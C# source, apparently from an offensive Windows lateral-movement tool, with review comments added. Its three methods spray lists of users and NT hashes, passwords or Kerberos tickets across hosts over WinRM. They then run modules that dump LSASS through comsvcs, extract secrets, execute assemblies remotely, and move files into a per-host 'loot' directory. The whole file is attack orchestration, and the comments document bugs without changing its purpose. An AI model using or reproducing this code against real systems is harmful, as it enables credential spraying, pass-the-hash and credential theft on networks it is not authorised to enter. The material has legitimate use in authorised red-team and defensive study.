/// <summary>
/// Runs the selected <c>Wsman</c> module against each host in <paramref name="computernames"/>
/// under the caller's current security context (no token or impersonation is set up in this method).
/// </summary>
/// <param name="computernames">Hosts to contact; each is first probed on port 5985 via <c>Misc.CheckHostPort</c> and skipped when unreachable.</param>
/// <param name="module">Module selector, matched by substring; an empty string or anything containing "exec" selects <c>Wsman.CheckLocalAdmin</c>.</param>
/// <param name="moduleargument">Passed through to <c>Wsman.CheckLocalAdmin</c> and <c>Wsman.ExecuteAssembly</c>.</param>
/// <param name="path">Path handed to the assembly, download and upload modules.</param>
/// <param name="destination">Target path for the download and upload modules.</param>
/// <param name="flags">Passed through to <c>Wsman.CheckLocalAdmin</c> and <c>Wsman.ExecuteAssembly</c>.</param>
/// <remarks>
/// Per-host failures are caught and printed together with the full exception text so one host
/// cannot abort the loop. The dispatch chain has no final <c>else</c>: a module name that matches
/// none of the branches produces no message and the host is silently skipped after the port check.
/// </remarks>
public static void WINRM(string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags)
{
    foreach (string computername in computernames)
    {
        try
        {
            Console.WriteLine(String.Format("[*] Checking {0}", computername));
            // Reachability gate: hosts not answering on 5985 are reported and skipped.
            if (!Misc.CheckHostPort(computername, 5985))
            {
                Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
                Console.WriteLine();
                continue;
            }
            // Module dispatch: first substring match wins.
            if (module.Length == 0 || module.Contains("exec"))
            {
                Wsman.CheckLocalAdmin(computername, moduleargument, flags);
            }
            else if (module.Contains("comsvcs"))
            {
                Wsman.InvokeComSvcsLsassDump(computername);
            }
            else if (module.Contains("secrets") || module.Contains("secret"))
            {
                // "secrets" already contains "secret", so the first test is redundant.
                Wsman.GetSecrets(computername);
            }
            else if (module.Contains("assembly"))
            {
                Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
            }
            else if (module.Contains("download"))
            {
                Wsman.CopyFile(computername, path, destination);
            }
            else if (module.Contains("upload"))
            {
                Wsman.UploadFile(computername, path, destination);
            }
            Console.WriteLine("");
        }
        catch (Exception e)
        {
            // Full exception (including stack trace) goes to stdout; relevant when output is captured or logged.
            Console.WriteLine("[-] {0}:5985 - {1}", computername, e.ToString());
        }
    }
}
/// <summary>
/// Tries every secret for every user in <paramref name="users"/> and, under that identity, runs the
/// selected <c>Wsman</c> module on each host in <paramref name="computernames"/>.
/// The branch is chosen by <typeparamref name="T"/>: <c>NTHash</c> secrets are applied with
/// <c>SetThreadToken</c>, <c>ClearText</c> secrets through a disposable <c>Impersonator.Impersonation</c>.
/// Any other <typeparamref name="T"/> falls through both branches and does nothing.
/// </summary>
/// <typeparam name="T">Either <c>NTHash</c> (read via property <c>Nthash</c>) or <c>ClearText</c> (read via property <c>Cleartext</c>); the property is fetched by reflection and cast to <c>string[]</c>.</typeparam>
/// <param name="users">User names to try; the outer loop.</param>
/// <param name="domain">Domain passed to <c>SetThreadToken</c> / <c>Impersonation</c>.</param>
/// <param name="secrets">Container object whose <c>Nthash</c> or <c>Cleartext</c> property holds the secrets to try.</param>
/// <param name="computernames">Hosts to contact; each is probed on port 5985 via <c>Misc.CheckHostPort</c> and skipped when unreachable.</param>
/// <param name="module">Module selector, matched by substring; empty or containing "exec" selects <c>Wsman.CheckLocalAdmin</c>. Unlike <c>WINRM</c>, this method has no "upload" branch.</param>
/// <param name="moduleargument">Passed through to <c>Wsman.CheckLocalAdmin</c> and <c>Wsman.ExecuteAssembly</c>.</param>
/// <param name="path">Path handed to the assembly and download modules.</param>
/// <param name="destination">Target path for the download module.</param>
/// <param name="flags">Passed through to <c>Wsman.CheckLocalAdmin</c> and <c>Wsman.ExecuteAssembly</c>.</param>
/// <exception cref="InvalidOperationException">From <c>Single</c> when <paramref name="secrets"/> does not expose exactly one property with the expected name.</exception>
/// <remarks>
/// Review notes: every secret is echoed to stdout in clear ("[*] secret: ...") before use, so captured
/// console output contains credential material. There is no try/catch in this method: an exception
/// from any <c>Wsman</c> call aborts the whole job; the <c>using</c> still disposes the impersonation in
/// the ClearText branch, but nothing in this method reverts the thread token set by <c>SetThreadToken</c>.
/// A <c>loot/&lt;host&gt;</c> directory is created under the working directory for every reachable host.
/// </remarks>
public static void StartJob<T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags)
{
    // Holds NT hashes in the first branch despite the name; clear-text passwords in the second.
    string[] passwords;
    if (typeof(T) == typeof(NTHash))
    {
        passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Nthash").GetValue(secrets, null);
        foreach (string user in users)
        {
            foreach (string password in passwords)
            {
                Console.WriteLine("------------------");
                Console.WriteLine(string.Format("[*] User: {0}", user));
                Console.WriteLine(string.Format("[*] domain: {0}", domain));
                Console.WriteLine(string.Format("[*] secret: {0}", password));
                Console.WriteLine();
                // NOTE(review): no matching revert call in this method; confirm SetThreadToken replaces the previous token on the next iteration.
                SetThreadToken(user, domain, password);
                foreach (string computername in computernames)
                {
                    Console.WriteLine(String.Format("[*] Checking {0}", computername));
                    if (!Misc.CheckHostPort(computername, 5985))
                    {
                        Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
                        Console.WriteLine();
                        continue;
                    }
                    // Per-host output directory, created even when the selected module writes nothing.
                    if (!Directory.Exists(Path.Combine("loot", computername)))
                    {
                        Directory.CreateDirectory(Path.Combine("loot", computername));
                    }
                    if (module.Length == 0 || module.Contains("exec"))
                    {
                        Wsman.CheckLocalAdmin(computername, moduleargument, flags);
                    }
                    else if (module.Contains("comsvcs"))
                    {
                        Wsman.InvokeComSvcsLsassDump(computername);
                    }
                    else if (module.Contains("secrets") || module.Contains("secret"))
                    {
                        Wsman.GetSecrets(computername);
                    }
                    else if (module.Contains("assembly"))
                    {
                        Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
                    }
                    else if (module.Contains("download"))
                    {
                        Wsman.CopyFile(computername, path, destination);
                    }
                    Console.WriteLine("");
                }
            }
        }
    }
    else if (typeof(T) == typeof(ClearText))
    {
        passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Cleartext").GetValue(secrets, null);
        foreach (string user in users)
        {
            foreach (string password in passwords)
            {
                Console.WriteLine("------------------");
                Console.WriteLine(string.Format("[*] User: {0}", user));
                Console.WriteLine(string.Format("[*] domain: {0}", domain));
                Console.WriteLine(string.Format("[*] secret: {0}", password));
                Console.WriteLine();
                // Impersonation is scoped to this block and disposed on exit, including on exceptions.
                using (new Impersonator.Impersonation(domain, user, password))
                {
                    foreach (string computername in computernames)
                    {
                        Console.WriteLine(String.Format("[*] Checking {0}", computername));
                        if (!Misc.CheckHostPort(computername, 5985))
                        {
                            Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
                            Console.WriteLine();
                            continue;
                        }
                        if (!Directory.Exists(Path.Combine("loot", computername)))
                        {
                            Directory.CreateDirectory(Path.Combine("loot", computername));
                        }
                        if (module.Length == 0 || module.Contains("exec"))
                        {
                            Wsman.CheckLocalAdmin(computername, moduleargument, flags);
                        }
                        else if (module.Contains("comsvcs"))
                        {
                            Wsman.InvokeComSvcsLsassDump(computername);
                        }
                        else if (module.Contains("secrets") || module.Contains("secret"))
                        {
                            Wsman.GetSecrets(computername);
                        }
                        else if (module.Contains("assembly"))
                        {
                            Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
                        }
                        else if (module.Contains("download"))
                        {
                            Wsman.CopyFile(computername, path, destination);
                        }
                        Console.WriteLine("");
                    }
                }
            }
        }
    }
}
/// <summary>
/// Kerberos variant: obtains a TGT either per user/secret pair through <c>SecurityContext.AskTicket</c>
/// or by importing <paramref name="ticket"/> through <c>SecurityContext.ImportTicket</c>, then runs the
/// selected <c>Wsman</c> module on every host in <paramref name="computernames"/>.
/// </summary>
/// <param name="users">User names to try; only used when <paramref name="ticket"/> is empty.</param>
/// <param name="domain">Realm; upper-cased and prefixed to the user name as the salt for <c>Crypto.KerberosPasswordHash</c>.</param>
/// <param name="passwords">Clear-text secrets; hashed with <paramref name="encType"/> before the ticket request.</param>
/// <param name="hashes">Pre-computed keys; chosen over <paramref name="passwords"/> whenever non-empty.</param>
/// <param name="ticket">When non-empty it is imported as-is and <paramref name="users"/>, <paramref name="passwords"/> and <paramref name="hashes"/> are ignored.</param>
/// <param name="encType">Kerberos encryption type used for hashing and for the ticket request.</param>
/// <param name="dc">Domain controller handed to <c>SecurityContext.AskTicket</c>.</param>
/// <param name="computernames">Hosts to contact; each is probed on port 5985 via <c>Misc.CheckHostPort</c> and skipped when unreachable.</param>
/// <param name="module">Module selector, matched by substring; empty or containing "exec" selects <c>Wsman.CheckLocalAdmin</c>.</param>
/// <param name="moduleargument">Passed through to <c>Wsman.CheckLocalAdmin</c> and <c>Wsman.ExecuteAssembly</c>.</param>
/// <param name="path">Path handed to the assembly, download and upload modules.</param>
/// <param name="destination">Target path for the download and upload modules.</param>
/// <param name="flags">Passed through to <c>Wsman.CheckLocalAdmin</c> and <c>Wsman.ExecuteAssembly</c>.</param>
/// <remarks>
/// Review notes (behaviour as written, not changed here):
/// - <c>AToken.MakeToken</c> at entry is paired with <c>AToken.RevertFromToken</c> at exit, but the
///   <c>return</c> on a failed ticket import and any uncaught exception (there is no try/catch) skip the revert.
/// - The secret list is taken from <paramref name="hashes"/> when it is non-empty, yet the "hash it first"
///   decision keys on <c>passwords.Length > 0</c>; if both arrays are populated, each hash is re-hashed as if it were a password.
/// - Secrets and the raw ticket value are echoed to stdout in clear.
/// - Success is detected by a substring match on the text returned by <c>AskTicket</c> / <c>ImportTicket</c>.
/// </remarks>
public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags)
{
    // NOTE(review): purpose of the placeholder credentials is not visible here; presumably establishes a fresh logon context for the ticket — confirm in AToken.
    AToken.MakeToken("Fake", "Fake", "Fake");
    string ticketoutput;
    if (String.IsNullOrEmpty(ticket))
    {
        foreach (string user in users)
        {
            // Hashes take precedence over passwords when both are supplied.
            var secrets = hashes.Length > 0 ? hashes : passwords;
            foreach (string secret in secrets)
            {
                string hash;
                // NOTE(review): this test does not agree with the selection above (see <remarks>).
                if (passwords.Length > 0)
                {
                    // NOTE(review): culture-sensitive ToUpper; ToUpperInvariant would avoid locale-dependent casing.
                    string salt = String.Format("{0}{1}", domain.ToUpper(), user);
                    hash = Crypto.KerberosPasswordHash(encType, secret, salt);
                }
                else
                {
                    hash = secret;
                }
                Console.WriteLine("------------------");
                Console.WriteLine(string.Format("[*] User: {0}", user));
                Console.WriteLine(string.Format("[*] domain: {0}", domain));
                Console.WriteLine(string.Format("[*] secret: {0}", secret));
                ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
                if (ticketoutput.Contains("[+] Ticket successfully imported!"))
                {
                    Console.WriteLine("[+] Ticket successfully imported!");
                }
                else
                {
                    // Next secret for the same user; nothing is cleaned up between attempts.
                    Console.WriteLine("[-] Could not request TGT");
                    continue;
                }
                //ticket debugging
                //List<LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(false, new LUID(), "", "", "", true);
                //LSA.DisplaySessionCreds(sessionCreds, LSA.TicketDisplayFormat.Klist);
                Console.WriteLine();
                foreach (string computername in computernames)
                {
                    Console.WriteLine(String.Format("[*] Checking {0}", computername));
                    if (!Misc.CheckHostPort(computername, 5985))
                    {
                        Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
                        Console.WriteLine();
                        continue;
                    }
                    // Per-host output directory, created even when the selected module writes nothing.
                    if (!Directory.Exists(Path.Combine("loot", computername)))
                    {
                        Directory.CreateDirectory(Path.Combine("loot", computername));
                    }
                    if (module.Length == 0 || module.Contains("exec"))
                    {
                        Wsman.CheckLocalAdmin(computername, moduleargument, flags);
                    }
                    else if (module.Contains("comsvcs"))
                    {
                        Wsman.InvokeComSvcsLsassDump(computername);
                    }
                    else if (module.Contains("secrets") || module.Contains("secret"))
                    {
                        Wsman.GetSecrets(computername);
                    }
                    else if (module.Contains("assembly"))
                    {
                        Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
                    }
                    else if (module.Contains("download"))
                    {
                        Wsman.CopyFile(computername, path, destination);
                    }
                    else if (module.Contains("upload"))
                    {
                        Wsman.UploadFile(computername, path, destination);
                    }
                    Console.WriteLine("");
                }
            }
        }
    }
    else
    {
        Console.WriteLine("------------------");
        Console.WriteLine(string.Format("[*] Ticket: {0}", ticket));
        ticketoutput = SecurityContext.ImportTicket(ticket);
        if (ticketoutput.Contains("[+] Ticket successfully imported!"))
        {
            Console.WriteLine("[+] TGT imported successfully!");
        }
        else
        {
            // NOTE(review): this return bypasses AToken.RevertFromToken() at the end of the method.
            Console.WriteLine("[-] Could not import TGT");
            return;
        }
        //ticket debugging
        //List<LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(false, new LUID(), "", "", "", true);
        //LSA.DisplaySessionCreds(sessionCreds, LSA.TicketDisplayFormat.Klist);
        Console.WriteLine();
        foreach (string computername in computernames)
        {
            Console.WriteLine(String.Format("[*] Checking {0}", computername));
            if (!Misc.CheckHostPort(computername, 5985))
            {
                // NOTE(review): surplus 'flags' argument — the format string has only one placeholder, so it is ignored.
                Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername, flags));
                Console.WriteLine();
                continue;
            }
            if (!Directory.Exists(Path.Combine("loot", computername)))
            {
                Directory.CreateDirectory(Path.Combine("loot", computername));
            }
            if (module.Length == 0 || module.Contains("exec"))
            {
                Wsman.CheckLocalAdmin(computername, moduleargument, flags);
            }
            else if (module.Contains("comsvcs"))
            {
                Wsman.InvokeComSvcsLsassDump(computername);
            }
            else if (module.Contains("secrets") || module.Contains("secret"))
            {
                Wsman.GetSecrets(computername);
            }
            else if (module.Contains("assembly"))
            {
                Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
            }
            else if (module.Contains("download"))
            {
                Wsman.CopyFile(computername, path, destination);
            }
            else if (module.Contains("upload"))
            {
                Wsman.UploadFile(computername, path, destination);
            }
            Console.WriteLine("");
        }
    }
    // Only reached on the normal path; see the early return and the missing try/catch above.
    AToken.RevertFromToken();
}